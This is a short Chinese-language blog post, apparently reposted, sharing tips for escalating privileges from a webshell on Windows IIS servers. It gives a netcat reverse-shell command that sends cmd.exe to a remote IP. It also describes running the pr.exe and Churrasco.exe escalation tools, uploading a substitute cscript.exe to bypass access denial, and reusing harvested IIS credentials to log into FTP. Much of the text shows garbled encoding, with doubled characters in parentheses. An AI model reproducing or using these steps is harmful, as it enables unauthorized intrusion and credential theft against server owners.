webshell下提權(quán)兩個(gè)小技巧分享
cmd路徑:
c:\windows\temp\cmd.exe
nc也在同目錄下
例如反彈cmdshell:
"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"
通常都不會(huì)成功。
而直接在 cmd路徑上 輸入 c:\windows\temp\nc.exe
命令輸入 -vv ip 999 -e c:\windows\temp\cmd.exe
卻能成功。。
這個(gè)不是重點(diǎn)
我們通常 執(zhí)行 pr.exe 或 Churrasco.exe 時(shí) 有時(shí)候也需要 按照上面的 方法才能成功。
友情檢測(cè)波爾遠(yuǎn)程控制官方網(wǎng)站
作者:MYC00l [Y.D.T]
第一處:把代碼保存為1.vbs 上傳到服務(wù)器上,執(zhí)行cscript 1.vbs,又提示拒絕訪問(wèn)。
其實(shí)這里,我們只要自己上傳一個(gè)cscript.exe 一般就可以解決問(wèn)題,這個(gè)程序默認(rèn)位于系統(tǒng)文件夾下,是win32 控制臺(tái)下的腳本宿主引擎,用來(lái)執(zhí)行vbs 等腳本程序的。
第二處:用VBS腳本查看到目標(biāo)IIS帳號(hào)和密碼后,CMD下FTP發(fā)現(xiàn)目標(biāo)用的是微軟FTP,直接用IIS帳號(hào)和密碼登錄進(jìn)去了。
IIS帳號(hào)和密碼和微軟自帶的FTP帳號(hào)和密碼默認(rèn)都是一樣的。
版權(quán)聲明:本站文章來(lái)源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請(qǐng)保持原文完整并注明來(lái)源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來(lái)源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來(lái),僅供學(xué)習(xí)參考,不代表本站立場(chǎng),如有內(nèi)容涉嫌侵權(quán),請(qǐng)聯(lián)系alex-e#qq.com處理。